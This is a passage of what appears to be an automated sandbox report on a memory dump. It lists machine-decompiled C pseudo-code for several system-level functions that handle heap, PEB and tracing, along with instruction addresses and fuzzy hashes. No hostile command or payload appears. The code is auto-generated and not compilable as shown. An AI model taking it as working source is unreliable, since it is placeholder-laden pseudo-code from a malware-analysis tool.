0x0307372f
0x03073733
0x03073735
0x03073738
0x0307373b
0x0307373d
0x03073740
0x00000000
0x00000000
0x03073746
0x03073749
0x00000000
0x00000000
0x0307374f
0x03073751
0x00000000
0x00000000
0x03073757
0x03073759
0x0307375c
0x0307375c
0x0307375e
0x0307375e
0x03073761
0x03073764
0x00000000
0x00000000
0x03073766
0x03073768
0x030737a3
0x030737a3
0x030737a5
0x030737a7
0x030737ad
0x030737b0
0x030737b2
0x030737bc
0x030737c2
0x030737c2
0x030737b2
0x03019187
0x03019187
0x0301918a
0x0301918d
0x0301918f
0x03019192
0x03019195
0x00000000
0x03019195
0x00000000
0x03019187
0x0307376a
0x0307376a
0x0307376c
0x0307376c
0x0307376f
0x03073775
0x00000000
0x00000000
0x03073777
0x03073779
0x00000000
0x00000000
0x03073782
0x03073787
0x03073789
0x03073790
0x03073790
0x0307378b
0x0307378b
0x0307378b
0x03073792
0x03073795
0x03073795
0x03073798
0x03073798
0x0307379b
0x0307379b
0x030191a3
0x030191a9
0x030191b0
0x030191b4
0x030191b4
0x030191bb
0x030191c0
0x030191c5
0x030191c7
0x030737da
0x030191cd
0x030191cd
0x030191cd
0x030191d2
0x030191d5
0x03019239
0x03019239
0x030191d7
0x030191db
0x030191e1
0x030191e7
0x030191fd
0x03019203
0x0301921e
0x03019223
0x00000000
0x03019223
0x03019205
0x03019208
0x0301920c
0x03019214
0x03019214
0x030191e9
0x030191e9
0x030191ee
0x030191f3
0x030191f3
0x030191f3
0x030191e7
0x00000000
0x030191db
0x03019187
0x03019168

Memory Dump Source

Source File: 00000002.00000002.276352542.0000000002FF0000.00000040.00000001.sdmp, Offset: 02FF0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 97377bc19b11cf30457bd00555179b700e351ce91f97a1662984759e0858763b
Instruction ID: 3b422f704ad8a05ce94423f4804653d8965a1664ee4ba26625fcedd0513a986b
Opcode Fuzzy Hash: 97377bc19b11cf30457bd00555179b700e351ce91f97a1662984759e0858763b
Instruction Fuzzy Hash: 5731CE79A07288DFDBA5DB6CC098BEDBBF5BB89314F198599C4046B240C370A9D0CB91

Uniqueness

Uniqueness Score: -1.00%

Function 03041DB5, Relevance: .1, Instructions: 87
COMMON

Download Yara Rule

C-Code - Quality: 60%

			E03041DB5(intOrPtr __ecx, intOrPtr* __edx, intOrPtr* _a4) {
				char _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr* _v20;
				void* _t22;
				char _t23;
				void* _t36;
				intOrPtr _t42;
				intOrPtr _t43;

				_v12 = __ecx;
				_t43 = 0;
				_v20 = __edx;
				_t42 =  *__edx;
				 *__edx = 0;
				_v16 = _t42;
				_push( &_v8);
				_push(0);
				_push(0);
				_push(6);
				_push(0);
				_push(__ecx);
				_t36 = ((0 | __ecx !=  *((intOrPtr*)( *[fs:0x30] + 8))) - 0x00000001 & 0xc0000000) + 0x40000002;
				_push(_t36);
				_t22 = E0303F460();
				if(_t22 < 0) {
					if(_t22 == 0xc0000023) {
						goto L1;
					}
					L3:
					return _t43;
				}
				L1:
				_t23 = _v8;
				if(_t23 != 0) {
					_t38 = _a4;
					if(_t23 >  *_a4) {
						_t42 = L03034620(_t38,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t23);
						if(_t42 == 0) {
							goto L3;
						}
						_t23 = _v8;
					}
					_push( &_v8);
					_push(_t23);
					_push(_t42);
					_push(6);
					_push(_t43);
					_push(_v12);
					_push(_t36);
					if(E0303F460() < 0) {
						if(_t42 != 0 && _t42 != _v16) {
							L030377F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t43, _t42);
						}
						goto L3;
					}
					 *_v20 = _t42;
					 *_a4 = _v8;
				}
				_t43 = 1;
				goto L3;
			}

0x03041dc2
0x03041dc5
0x03041dc7
0x03041dcc
0x03041dce
0x03041dd6
0x03041ddf
0x03041de0
0x03041de1
0x03041de5
0x03041de8
0x03041def
0x03041df0
0x03041df6
0x03041df7
0x03041dfe
0x03041e1a
0x00000000
0x00000000
0x03041e0b
0x03041e12
0x03041e12
0x03041e00
0x03041e00
0x03041e05
0x03041e1e
0x03041e23
0x0308570f
0x03085713
0x00000000
0x00000000
0x03085719
0x03085719
0x03041e2c
0x03041e2d
0x03041e2e
0x03041e2f
0x03041e31
0x03041e32
0x03041e35
0x03041e3d
0x03085723
0x0308573d
0x0308573d
0x00000000
0x03085723
0x03041e49
0x03041e4e
0x03041e4e
0x03041e09
0x00000000

Memory Dump Source

Source File: 00000002.00000002.276352542.0000000002FF0000.00000040.00000001.sdmp, Offset: 02FF0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 113d149f2ee32d0cf172cc5618c6b00e5ec00d0f660e83749918783638c296a2
Instruction ID: 7fb54c9c63b0f93ef34f08d2537891f6023b1a3177845729c0865ef2db791b74
Opcode Fuzzy Hash: 113d149f2ee32d0cf172cc5618c6b00e5ec00d0f660e83749918783638c296a2
Instruction Fuzzy Hash: 0421A3B9A02219FFC714CF5ACC80FABFBBDEF8A640F154065E5059B210D670AE41D790

Uniqueness

Uniqueness Score: -1.00%

Function 03030050, Relevance: .1, Instructions: 81
COMMON

Download Yara Rule

C-Code - Quality: 53%

			E03030050(void* __ecx) {
				signed int _v8;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				intOrPtr* _t30;
				intOrPtr* _t31;
				signed int _t34;
				void* _t40;
				void* _t41;
				signed int _t44;
				intOrPtr _t47;
				signed int _t58;
				void* _t59;
				void* _t61;
				void* _t62;
				signed int _t64;

				_push(__ecx);
				_v8 =  *0x310d360 ^ _t64;
				_t61 = __ecx;
				_t2 = _t61 + 0x20; // 0x20
				E03049ED0(_t2, 1, 0);
				_t52 =  *(_t61 + 0x8c);
				_t4 = _t61 + 0x8c; // 0x8c
				_t40 = _t4;
				do {
					_t44 = _t52;
					_t58 = _t52 & 0x00000001;
					_t24 = _t44;
					asm("lock cmpxchg [ebx], edx");
					_t52 = _t44;
				} while (_t52 != _t44);
				if(_t58 == 0) {
					L7:
					_pop(_t59);
					_pop(_t62);
					_pop(_t41);
					return E0305B640(_t24, _t41, _v8 ^ _t64, _t52, _t59, _t62);
				}
				asm("lock xadd [esi], eax");
				_t47 =  *[fs:0x18];
				 *((intOrPtr*)(_t61 + 0x50)) =  *((intOrPtr*)(_t47 + 0x19c));
				 *((intOrPtr*)(_t61 + 0x54)) =  *((intOrPtr*)(_t47 + 0x1a0));
				_t30 =  *((intOrPtr*)( *[fs:0x30] + 0x50));
				if(_t30 != 0) {
					if( *_t30 == 0) {
						goto L4;
					}
					_t31 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
					L5:
					if( *_t31 != 0) {
						_t18 = _t61 + 0x78; // 0x78
						E030E8A62( *(_t61 + 0x5c), _t18,  *((intOrPtr*)(_t61 + 0x30)),  *((intOrPtr*)(_t61 + 0x34)),  *((intOrPtr*)(_t61 + 0x3c)));
					}
					_t52 =  *(_t61 + 0x5c);
					_t11 = _t61 + 0x78; // 0x78
					_t34 = E03049702(_t40, _t11,  *(_t61 + 0x5c),  *((intOrPtr*)(_t61 + 0x74)), 0);
					_t24 = _t34 | 0xffffffff;
					asm("lock xadd [esi], eax");
					if((_t34 | 0xffffffff) == 0) {
						 *0x310b1e0(_t61);
						_t24 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t61 + 4))))))();
					}
					goto L7;
				}
				L4:
				_t31 = 0x7ffe0386;
				goto L5;
			}

0x03030055
0x0303005d
0x03030062
0x0303006c
0x0303006f
0x03030074
0x0303007a
0x0303007a
0x03030080
0x03030080
0x03030087
0x0303008d
0x0303008f
0x03030093
0x03030095
0x0303009b
0x030300f8
0x030300fb
0x030300fc
0x030300ff
0x03030108
0x03030108
0x030300a2
0x030300a6
0x030300b3
0x030300bc
0x030300c5
0x030300ca
0x0307c01e
0x00000000
0x00000000
0x0307c02d
0x030300d5
0x030300d9
0x0307c03d
0x0307c046
0x0307c046
0x030300df
0x030300e2
0x030300ea
0x030300ef
0x030300f2
0x030300f6
0x03030111
0x03030117
0x03030117
0x00000000
0x030300f6
0x030300d0
0x030300d0
0x00000000

Memory Dump Source

Source File: 00000002.00000002.276352542.0000000002FF0000.00000040.00000001.sdmp, Offset: 02FF0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ad6f0f6875ee84276cdd5413965eaa2143459d111183d8233ff7ca92731ca1b4
Instruction ID: a83674081dba426ac5b14de3a054a6ada544f04c588df40e752103a2358e675f
Opcode Fuzzy Hash: ad6f0f6875ee84276cdd5413965eaa2143459d111183d8233ff7ca92731ca1b4
Instruction Fuzzy Hash: C7318F31602B04CFD765CF28C944B9AB3E9FF89714F18856DE4978B650EB75A801CB90

Uniqueness

Uniqueness Score: -1.00%

Function 03096C0A, Relevance: .1, Instructions: 79
COMMON

Download Yara Rule

C-Code - Quality: 77%

			E03096C0A(signed short* __ecx, signed char __edx, signed char _a4, signed char _a8) {
				signed short* _v8;
				signed char _v12;
				void* _t22;
				signed char* _t23;
				intOrPtr _t24;
				signed short* _t44;
				void* _t47;
				signed char* _t56;
				signed char* _t58;

				_t48 = __ecx;
				_push(__ecx);
				_push(__ecx);
				_t44 = __ecx;
				_v12 = __edx;
				_v8 = __ecx;
				_t22 = E03037D50();
				_t58 = 0x7ffe0384;
				if(_t22 == 0) {
					_t23 = 0x7ffe0384;
				} else {
					_t23 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
				}
				if( *_t23 != 0) {
					_t24 =  *0x3107b9c; // 0x0
					_t47 = ( *_t44 & 0x0000ffff) + 0x30;
					_t23 = L03034620(_t48,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t24 + 0x180000, _t47);
					_t56 = _t23;
					if(_t56 != 0) {
						_t56[0x24] = _a4;
						_t56[0x28] = _a8;
						_t56[6] = 0x1420;
						_t56[0x20] = _v12;
						_t14 =  &(_t56[0x2c]); // 0x2c
						E0305F3E0(_t14, _v8[2],  *_v8 & 0x0000ffff);
						_t56[0x2c + (( *_v8 & 0x0000ffff) >> 1) * 2] = 0;
						if(E03037D50() != 0) {
							_t58 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
						}
						_push(_t56);
						_push(_t47 - 0x20);
						_push(0x402);
						_push( *_t58 & 0x000000ff);
						E03059AE0();
						_t23 = L030377F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t56);
					}
				}
				return _t23;
			}

0x03096c0a
0x03096c0f
0x03096c10
0x03096c13
0x03096c15
0x03096c19
0x03096c1c
0x03096c21
0x03096c28
0x03096c3a
0x03096c2a
0x03096c33
0x03096c33
0x03096c3f
0x03096c48
0x03096c4d
0x03096c60
0x03096c65
0x03096c69
0x03096c73
0x03096c79
0x03096c7f
0x03096c86
0x03096c90
0x03096c94
0x03096ca6
0x03096cb2
0x03096cbd
0x03096cbd
0x03096cc3
0x03096cc7
0x03096ccb
0x03096cd0
0x03096cd1
0x03096ce2
0x03096ce2
0x03096c69
0x03096ced

Memory Dump Source

Source File: 00000002.00000002.276352542.0000000002FF0000.00000040.00000001.sdmp, Offset: 02FF0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a6144ced283272d0e3cba2b11e9959e339c5e1cb90a5a3b9894947af97c35f3e
Instruction ID: e2762d32a71db9d78356e165a04887f5ce66474387c874475de58a0b21b05ea4
Opcode Fuzzy Hash: a6144ced283272d0e3cba2b11e9959e339c5e1cb90a5a3b9894947af97c35f3e
Instruction Fuzzy Hash: FB21ABB5A01648AFDB15DF68D880E6AB7B8FF49710F04406AF908CB790D735ED10CBA4

Uniqueness

Uniqueness Score: -1.00%

Function 030590AF, Relevance: .1, Instructions: 76
COMMON

Download Yara Rule

C-Code - Quality: 82%

			E030590AF(intOrPtr __ecx, void* __edx, intOrPtr* _a4) {
				intOrPtr* _v0;
				void* _v8;
				signed int _v12;
				intOrPtr _v16;
				char _v36;
				void* _t38;
				intOrPtr _t41;
				void* _t44;
				signed int _t45;
				intOrPtr* _t49;
				signed int _t57;
				signed int _t58;
				intOrPtr* _t59;
				void* _t62;
				void* _t63;
				void* _t65;
				void* _t66;
				signed int _t69;
				intOrPtr* _t70;
				void* _t71;
				intOrPtr* _t72;
				intOrPtr* _t73;
				char _t74;

				_t65 = __edx;
				_t57 = _a4;
				_t32 = __ecx;
				_v8 = __edx;
				_t3 = _t32 + 0x14c; // 0x14c
				_t70 = _t3;
				_v16 = __ecx;
				_t72 =  *_t70;
				while(_t72 != _t70) {
					if( *((intOrPtr*)(_t72 + 0xc)) != _t57) {
						L24:
						_t72 =  *_t72;
						continue;
					}
					_t30 = _t72 + 0x10; // 0x10
					if(E0306D4F0(_t30, _t65, _t57) == _t57) {
						return 0xb7;
					}
					_t65 = _v8;
					goto L24;
				}
				_t61 = _t57;
				_push( &_v12);
				_t66 = 0x10;
				if(E0304E5E0(_t57, _t66) < 0) {
					return 0x216;
				}
				_t73 = L03034620(_t61,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _v12);
				if(_t73 == 0) {
					_t38 = 0xe;
					return _t38;
				}
				_t9 = _t73 + 0x10; // 0x10
				 *((intOrPtr*)(_t73 + 0xc)) = _t57;
				E0305F3E0(_t9, _v8, _t57);
				_t41 =  *_t70;
				if( *((intOrPtr*)(_t41 + 4)) != _t70) {
					_t62 = 3;
					asm("int 0x29");
					_push(_t62);
					_push(_t57);
					_push(_t73);
					_push(_t70);
					_t71 = _t62;
					_t74 = 0;
					_v36 = 0;
					_t63 = E0304A2F0(_t62, _t71, 1, 6,  &_v36);
					if(_t63 == 0) {
						L20:
						_t44 = 0x57;
						return _t44;
					}
					_t45 = _v12;
					_t58 = 0x1c;
					if(_t45 < _t58) {
						goto L20;
					}
					_t69 = _t45 / _t58;
					if(_t69 == 0) {
						L19:
						return 0xe8;
					}
					_t59 = _v0;
					do {
						if( *((intOrPtr*)(_t63 + 0xc)) != 2) {
							goto L18;
						}
						_t49 =  *((intOrPtr*)(_t63 + 0x14)) + _t71;
						 *_t59 = _t49;
						if( *_t49 != 0x53445352) {
							goto L18;
						}
						 *_a4 =  *((intOrPtr*)(_t63 + 0x10));
						return 0;
						L18:
						_t63 = _t63 + 0x1c;
						_t74 = _t74 + 1;
					} while (_t74 < _t69);
					goto L19;
				}
				 *_t73 = _t41;
				 *((intOrPtr*)(_t73 + 4)) = _t70;
				 *((intOrPtr*)(_t41 + 4)) = _t73;
				 *_t70 = _t73;
				 *(_v16 + 0xdc) =  *(_v16 + 0xdc) | 0x00000010;
				return 0;
			}

0x030590af
0x030590b8
0x030590bb
0x030590bf
0x030590c2
0x030590c2
0x030590c8
0x030590cb
0x030590cd
0x030914d7
0x030914eb
0x030914eb
0x00000000
0x030914eb
0x030914db
0x030914e6
0x00000000
0x030914f2
0x030914e8
0x00000000
0x030914e8
0x030590d8
0x030590da
0x030590dd
0x030590e5
0x00000000
0x03059139
0x030590fa
0x030590fe
0x03059142
0x00000000
0x03059142
0x03059104
0x03059107
0x0305910b
0x03059110
0x03059118
0x03059147
0x03059148
0x0305914f
0x03059150
0x03059151
0x03059152
0x03059156
0x0305915d
0x03059160
0x03059168
0x0305916c
0x030591bc
0x030591be
0x00000000
0x030591be
0x0305916e
0x03059173
0x03059176
0x00000000
0x00000000
0x0305917c
0x03059180
0x030591b5
0x00000000
0x030591b5
0x03059182
0x03059185
0x03059189
0x00000000
0x00000000
0x0305918e
0x03059190
0x03059198
0x00000000
0x00000000
0x030591a0
0x00000000
0x030591ad
0x030591ad
0x030591b0
0x030591b1
0x00000000
0x03059185
0x0305911a
0x0305911c
0x0305911f
0x03059125
0x03059127
0x00000000

Memory Dump Source

Source File: 00000002.00000002.276352542.0000000002FF0000.00000040.00000001.sdmp, Offset: 02FF0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6bfd702525c1db8ef159ef8001ebf0bb6a8fccc454e16ed8d2a19b71faa45fc1
Instruction ID: f234bbac87382f6595cad52ac9e163cc0a6f1bb2d4f9b168aa56f0fdab546fd8
Opcode Fuzzy Hash: 6bfd702525c1db8ef159ef8001ebf0bb6a8fccc454e16ed8d2a19b71faa45fc1
Instruction Fuzzy Hash: A8216275A01315EFDB21DF59C844EAAF7F8EB44350F14886AF949AB650D370ED40CB90

Uniqueness

Uniqueness Score: -1.00%

Function 03043B7A, Relevance: .1, Instructions: 75
COMMON

Download Yara Rule

C-Code - Quality: 59%

			E03043B7A(void* __ecx) {
				signed int _v8;
				char _v12;
				intOrPtr _v20;
				intOrPtr _t17;
				intOrPtr _t26;
				void* _t35;
				void* _t38;
				void* _t41;
				intOrPtr _t44;

				_t17 =  *0x31084c4; // 0x0
				_v12 = 1;
				_v8 =  *0x31084c0 * 0x4c;
				_t41 = __ecx;
				_t35 = L03034620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t17 + 0x000c0000 | 0x00000008,  *0x31084c0 * 0x4c);
				if(_t35 == 0) {
					_t44 = 0xc0000017;
				} else {
					_push( &_v8);
					_push(_v8);
					_push(_t35);
					_push(4);
					_push( &_v12);
					_push(0x6b);
					_t44 = E0305AA90();
					_v20 = _t44;
					if(_t44 >= 0) {
						E0305FA60( *((intOrPtr*)(_t41 + 0x20)), 0,  *0x31084c0 * 0xc);
						_t38 = _t35;
						if(_t35 < _v8 + _t35) {
							do {
								asm("movsd");
								asm("movsd");
								asm("movsd");
								_t38 = _t38 +  *((intOrPtr*)(_t38 + 4));
							} while (_t38 < _v8 + _t35);
							_t44 = _v20;
						}
					}
					_t26 =  *0x31084c4; // 0x0
					L030377F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t26 + 0xc0000, _t35);
				}
				return _t44;
			}

0x03043b89
0x03043b96
0x03043ba1
0x03043bab
0x03043bb5
0x03043bb9
0x03086298
0x03043bbf
0x03043bc2
0x03043bc3
0x03043bc9
0x03043bca
0x03043bcc
0x03043bcd
0x03043bd4
0x03043bd6
0x03043bdb
0x03043bea
0x03043bf7
0x03043bfb
0x03043bff
0x03043c09
0x03043c0a
0x03043c0b
0x03043c0f
0x03043c14
0x03043c18
0x03043c18
0x03043bfb
0x03043c1b
0x03043c30
0x03043c30
0x03043c3d

Memory Dump Source

Source File: 00000002.00000002.276352542.0000000002FF0000.00000040.00000001.sdmp, Offset: 02FF0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1e87accb7d3bd9a63ed2d5fef607a1e1ae56387b9a5e30923c16f622fee57fb7
Instruction ID: 2f7d5801fbd4b043a02507571395e0b0795164ab88cbdce500ba5e51f41e50eb
Opcode Fuzzy Hash: 1e87accb7d3bd9a63ed2d5fef607a1e1ae56387b9a5e30923c16f622fee57fb7
Instruction Fuzzy Hash: 5D218EB2A01608AFCB04DF58CD81B9AB7BDFB44708F1540A8E908EB251D371AE518BA4

Uniqueness

Uniqueness Score: -1.00%

Function 03096CF0, Relevance: .1, Instructions: 74
COMMON

Download Yara Rule

C-Code - Quality: 80%

			E03096CF0(void* __edx, intOrPtr _a4, short _a8) {
				char _v8;
				char _v12;
				char _v16;
				char _v20;
				char _v28;
				char _v36;
				char _v52;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed char* _t21;
				void* _t24;
				void* _t36;
				void* _t38;
				void* _t46;

				_push(_t36);
				_t46 = __edx;
				_v12 = 0;
				_v8 = 0;
				_v20 = 0;
				_v16 = 0;
				if(E03037D50() == 0) {
					_t21 = 0x7ffe0384;
				} else {
					_t21 = ( *[fs:0x30])[0x50] + 0x22a;
				}
				if( *_t21 != 0) {
					_t21 =  *[fs:0x30];
					if((_t21[0x240] & 0x00000004) != 0) {
						if(E03037D50() == 0) {
							_t21 = 0x7ffe0385;
						} else {
							_t21 = ( *[fs:0x30])[0x50] + 0x22b;
						}
						if(( *_t21 & 0x00000020) != 0) {
							_t56 = _t46;
							if(_t46 == 0) {
								_t46 = 0x2ff5c80;
							}
							_push(_t46);
							_push( &_v12);
							_t24 = E0304F6E0(_t36, 0, _t46, _t56);
							_push(_a4);
							_t38 = _t24;
							_push( &_v28);
							_t21 = E0304F6E0(_t38, 0, _t46, _t56);
							if(_t38 != 0) {
								if(_t21 != 0) {
									E03097016(_a8, 0, 0, 0,  &_v36,  &_v28);
									L03032400( &_v52);
								}
								_t21 = L03032400( &_v28);
							}
						}
					}
				}
				return _t21;
			}

0x03096cfb
0x03096d00
0x03096d02
0x03096d06
0x03096d0a
0x03096d0e
0x03096d19
0x03096d2b
0x03096d1b
0x03096d24
0x03096d24
0x03096d33
0x03096d39
0x03096d46
0x03096d4f
0x03096d61
0x03096d51
0x03096d5a
0x03096d5a
0x03096d69
0x03096d6b
0x03096d6d
0x03096d6f
0x03096d6f
0x03096d74
0x03096d79
0x03096d7a
0x03096d7f
0x03096d82
0x03096d88
0x03096d89
0x03096d90
0x03096d94
0x03096da7
0x03096db1
0x03096db1
0x03096dbb
0x03096dbb
0x03096d90
0x03096d69
0x03096d46
0x03096dc6

Memory Dump Source

Source File: 00000002.00000002.276352542.0000000002FF0000.00000040.00000001.sdmp, Offset: 02FF0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: eb6de8eddbf1bf629fb6a75940a8412c6db90bfdea7383a6995dc4609b467e8e
Instruction ID: 15210924f8efaad77b0b5e41a484fb4fa27f82462e5da361fabde5db6e3069fc
Opcode Fuzzy Hash: eb6de8eddbf1bf629fb6a75940a8412c6db90bfdea7383a6995dc4609b467e8e
Instruction Fuzzy Hash: 4D21F5729073499BDB11DF28C944BABF7ECAFC16A0F080867F990DB250D735C508D6A2

Uniqueness

Uniqueness Score: -1.00%

Function 030E070D, Relevance: .1, Instructions: 72
COMMON

Download Yara Rule

C-Code - Quality: 67%

			E030E070D(signed int* __ecx, signed int __edx, void* __eflags, signed int _a4, signed int _a8) {
				char _v8;
				intOrPtr _v11;
				signed int _v12;
				intOrPtr _v15;
				signed int _v16;
				intOrPtr _v28;
				void* __ebx;
				char* _t32;
				signed int* _t38;
				signed int _t60;

				_t38 = __ecx;
				_v16 = __edx;
				_t60 = E030E07DF(__ecx, __edx,  &_a4,  &_a8, 2);
				if(_t60 != 0) {
					_t7 = _t38 + 0x38; // 0x29cd5903
					_push( *_t7);
					_t9 = _t38 + 0x34; // 0x6adeeb00
					_push( *_t9);
					_v12 = _a8 << 0xc;
					_t11 = _t38 + 4; // 0x5de58b5b
					_push(0x4000);
					_v8 = (_a4 << 0xc) + (_v16 - ( *__ecx & _v16) >> 4 <<  *_t11) + ( *__ecx & _v16);
					E030DAFDE( &_v8,  &_v12);
					E030E1293(_t38, _v28, _t60);
					if(E03037D50() == 0) {
						_t32 = 0x7ffe0380;
					} else {
						_t32 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
					}
					if( *_t32 != 0 && ( *( *[fs:0x30] + 0x240) & 0x00000001) != 0) {
						_t21 = _t38 + 0x3c; // 0xc3595e5f
						E030D14FB(_t38,  *_t21, _v11, _v15, 0xd);
					}
				}
				return  ~_t60;
			}

0x030e071b
0x030e0724
0x030e0734
0x030e0738
0x030e074b
0x030e074b
0x030e0753
0x030e0753
0x030e0759
0x030e075d
0x030e0774
0x030e0779
0x030e077d
0x030e0789
0x030e0795
0x030e07a7
0x030e0797
0x030e07a0
0x030e07a0
0x030e07af
0x030e07c4
0x030e07cd
0x030e07cd
0x030e07af
0x030e07dc

Memory Dump Source

Source File: 00000002.00000002.276352542.0000000002FF0000.00000040.00000001.sdmp, Offset: 02FF0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 16b9495bd7cfc8dc207f06a58ad33f13931981def28ffdf8d69df6cf9eebd83e
Instruction ID: 89860418afd2c6cc3cb82053b293d5bffb7e02a10b6483df3adc97911c5ca675
Opcode Fuzzy Hash: 16b9495bd7cfc8dc207f06a58ad33f13931981def28ffdf8d69df6cf9eebd83e
Instruction Fuzzy Hash: 1C210E3A705300AFC705DF28C880AABBBE5EFC1210F088669F9948B381DA70D809CB91

Uniqueness

Uniqueness Score: -1.00%

Function 030E2EF7, Relevance: .1, Instructions: 72
COMMONCrypto

Download Yara Rule

C-Code - Quality: 35%

			E030E2EF7(void* __ecx, signed int __edx, void* _a8, signed int _a12) {
				char _v5;
				unsigned int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v32;
				signed int _v44;
				signed int _v48;
				intOrPtr _v52;
				intOrPtr _v56;
				signed int _v60;
				signed int _v64;
				void* _v68;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t62;
				void* _t71;
				signed int _t94;
				signed int _t105;
				signed int _t106;
				void* _t107;
				signed int _t114;
				signed int _t115;
				signed int _t141;
				signed int _t142;
				signed char _t145;
				signed char _t146;
				void* _t154;
				signed int _t155;
				void* _t156;
				signed int _t160;
				signed int _t164;
				void* _t165;
				signed int _t172;
				signed int _t174;

				_push(__ecx);
				_push(__ecx);
				_t105 = __edx;
				_t154 = __ecx;
				_t160 =  *__edx ^ __edx;
				_t141 =  *(__edx + 4) ^ __edx;
				if(( *(_t160 + 4) ^ _t160) != __edx || ( *_t141 ^ _t141) != __edx) {
					_t114 = 3;
					asm("int 0x29");
					_t174 = (_t172 & 0xfffffff8) - 0x24;
					_t62 =  *0x310d360 ^ _t174;
					_v32 = _t62;
					_push(_t105);
					_push(_t160);
					_t106 = _t114;
					_t115 = _v20;
					_push(_t154);
					_t155 = _t141;
					_t142 = _v16;
					__eflags = _t115;
					if(__eflags != 0) {
						asm("bsf esi, ecx");
					} else {
						asm("bsf esi, edx");
						_t62 = (_t62 & 0xffffff00 | __eflags != 0x00000000) & 0x000000ff;
						__eflags = _t62;
						if(_t62 == 0) {
							_t160 = _v44;
						} else {
							_t160 = _t160 + 0x20;
						}
					}
					__eflags = _t142;
					if(__eflags == 0) {
						asm("bsr eax, ecx");
					} else {
						asm("bsr ecx, edx");
						if(__eflags == 0) {
							_t62 = _v44;
						} else {
							_t27 = _t115 + 0x20; // 0x20
							_t62 = _t27;
						}
					}
					_v56 = (_t160 << 0xc) + _t155;
					_v60 = _t62 - _t160 + 1 << 0xc;
					_t71 = E0305D0F0(1, _t62 - _t160 + 1, 0);
					asm("adc edx, 0xffffffff");
					_v52 = E0305D0F0(_t71 + 0xffffffff, _t160, 0);
					_v48 = 0;
					_v44 = _t155 + 0x10;
					E03032280(_t155 + 0x10, _t155 + 0x10);
					__eflags = _a12;
					_push(_v64);
					_push(_v60);
					_push( *((intOrPtr*)(_t106 + 0x20)));
					if(_a12 == 0) {
						 *0x310b1e0();
						 *( *(_t106 + 0x30) ^  *0x3106110 ^ _t106)();
						 *(_t155 + 0xc) =  *(_t155 + 0xc) &  !_v60;
						_t54 = _t155 + 8;
						 *_t54 =  *(_t155 + 8) &  !_v64;
						__eflags =  *_t54;
						goto L18;
					} else {
						 *0x310b1e0();
						_t164 =  *( *(_t106 + 0x2c) ^  *0x3106110 ^ _t106)();
						__eflags = _t164;
						if(_t164 >= 0) {
							 *(_t155 + 8) =  *(_t155 + 8) | _v64;
							 *(_t155 + 0xc) =  *(_t155 + 0xc) | _v60;
							L18:
							asm("lock xadd [eax], ecx");
							_t164 = 0;
							__eflags = 0;
						}
					}
					E0302FFB0(_t106, _t155, _v56);
					_pop(_t156);
					_pop(_t165);
					_pop(_t107);
					__eflags = _v48 ^ _t174;
					return E0305B640(_t164, _t107, _v48 ^ _t174, 0, _t156, _t165);
				} else {
					_t94 = _t141 ^ _t160;
					 *_t141 = _t94;
					 *(_t160 + 4) = _t94;
					_t145 =  !( *(__edx + 8));
					_t146 = _t145 >> 8;
					_v12 = _t146 >> 8;
					_v5 =  *((intOrPtr*)((_t145 & 0x000000ff) + 0x2ffac00)) +  *((intOrPtr*)((_t146 & 0x000000ff) + 0x2ffac00));
					asm("lock xadd [eax], edx");
					return __ecx + 0x18;
				}
			}

0x030e2efc
0x030e2efd
0x030e2eff
0x030e2f03
0x030e2f0a
0x030e2f0c
0x030e2f15
0x030e2fba
0x030e2fbb
0x030e2fc5
0x030e2fcd
0x030e2fcf
0x030e2fd3
0x030e2fd4
0x030e2fd5
0x030e2fd7
0x030e2fda
0x030e2fdb
0x030e2fdd
0x030e2fe0
0x030e2fe2
0x030e2ffc
0x030e2fe4
0x030e2fe4
0x030e2fea
0x030e2fed
0x030e2fef
0x030e2ff6
0x030e2ff1
0x030e2ff1
0x030e2ff1
0x030e2fef
0x030e2fff
0x030e3001
0x030e301b
0x030e3003
0x030e3003
0x030e300e
0x030e3015
0x030e3010
0x030e3010
0x030e3010
0x030e3010
0x030e300e
0x030e302c
0x030e3035
0x030e303c
0x030e3046
0x030e304e
0x030e3056
0x030e305a
0x030e305e
0x030e3063
0x030e3067
0x030e306b
0x030e306f
0x030e3072
0x030e30af
0x030e30b5
0x030e30c1
0x030e30c9
0x030e30c9
0x030e30c9
0x00000000
0x030e3074
0x030e3081
0x030e3089
0x030e308b
0x030e308d
0x030e3093
0x030e309a
0x030e30ce
0x030e30d1
0x030e30d5
0x030e30d5
0x030e30d5
0x030e308d
0x030e30db
0x030e30e6
0x030e30e7
0x030e30e8
0x030e30e9
0x030e30f3
0x030e2f27
0x030e2f29
0x030e2f2b
0x030e2f2d
0x030e2f36
0x030e2f3d
0x030e2f4c
0x030e2f58
0x030e2fad
0x030e2fb7
0x030e2fb7

Memory Dump Source

Source File: 00000002.00000002.276352542.0000000002FF0000.00000040.00000001.sdmp, Offset: 02FF0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b68a00bfaeb6935dc80fcd0c1cd8988814e72d8284e65674ae52c4b6dd6e50ba
